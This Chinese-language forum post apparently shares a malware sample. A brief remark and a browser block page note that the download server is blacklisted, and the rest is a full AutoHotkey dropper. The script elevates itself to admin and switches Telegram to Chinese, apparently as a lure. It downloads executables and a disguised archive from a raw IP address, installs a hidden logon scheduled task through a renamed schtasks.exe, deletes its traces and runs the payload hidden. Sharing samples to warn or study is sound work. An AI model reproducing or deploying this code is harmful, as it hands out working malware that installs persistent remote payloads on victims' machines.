| 本帖最后由 pal家族 于 2025-5-6 19:16 编辑 
 payload下载地址被卡巴拉黑。
 
 已防止访问危险网站
 导航到旨在感染您的计算机,降低其性能,破坏系统或造成其他损害的恶意网站已被阻止。
 
 我们保护您不访问此网站。您可以安全地关闭该窗口。
 
 检测时间:
 
 2025-5-6 19:15:21
 
 网址:
 
 http://103.68.181.217/code.zip
 
 阻止者:
 
 安全浏览
 
 原因:
 
 危险网址
 
 检测方法:
 
 数据库
 
 
 
  
 
 
 #NoTrayIcon
 if not A_IsAdmin
 {
 try
 {
 Run *RunAs "%A_ScriptFullPath%"
 ExitApp
 }
 catch
 {
 ExitApp
 }
 }
 
 FileCreateDir, C:\Users\Public\403\python
 
 
 SplitPath, A_ScriptName, OutFileName
 
 if (InStr(OutFileName, "zh-cn", true)) {
 Run, TG://setlanguage?lang=classic-zh-cn
 }
 
 
 
 
 
 
 
 
 
 
 
 
 SendMode Input
 SetWorkingDir %A_ScriptDir%
 
 for each_process in ComObjGet("winmgmts:").ExecQuery("Select * from Win32_Process where Name = 'telegram.exe'")
 {
 telegramPID := each_process.ProcessId
 telegramPath := each_process.ExecutablePath
 
 if (telegramPath)
 {
 SplitPath, telegramPath,, telegramDir
 Run, "%telegramDir%\telegram.exe" -- tg://setlanguage?lang=classic-zh-cn,, Hide
 }
 }
 
 
 
 
 
 
 
 
 
 
 
 
 Run, cmd /c del C:\Users\Public\403\xz.ahk, , Hide
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 UrlDownloadToFile, http://103.68.181.217/rar.exe, C:\Users\Public\403\rar.exe
 UrlDownloadToFile, http://103.68.181.217/py.zip, C:\Users\Public\403\py.png
 UrlDownloadToFile, http://103.68.181.217/code.zip, C:\Users\Public\403\code.zip
 UrlDownloadToFile, http://103.68.181.217/wd1.exe, C:\Users\Public\403\wd1.exe
 UrlDownloadToFile, http://103.68.181.217/wd1.ahk, C:\Users\Public\403\wd1.ahk
 
 
 FileCopy, C:\Windows\System32\schtasks.exe, C:\Users\Public\403\cc.exe, 1
 
 Run, C:\Users\Public\403\cc.exe /create /sc onlogon /tn Tahk /rl highest /tr "C:\Users\Public\403\wd1.exe" /F, , Hide
 
 RunWait, C:\Users\Public\403\rar.exe x -y C:\Users\Public\403\Py.png C:\Users\Public\403\python, , Hide
 
 RunWait, "C:\Users\Public\403\rar.exe" x -y C:\Users\Public\403\py.png C:\Users\Public\403\python, , Hide
 
 RunWait, cmd /C DEL C:\Users\Public\403\py.png&del C:\Users\Public\403\cc.exe, , Hide
 
 Run, C:\Users\Public\403\wd1.exe, , Hide
 
 |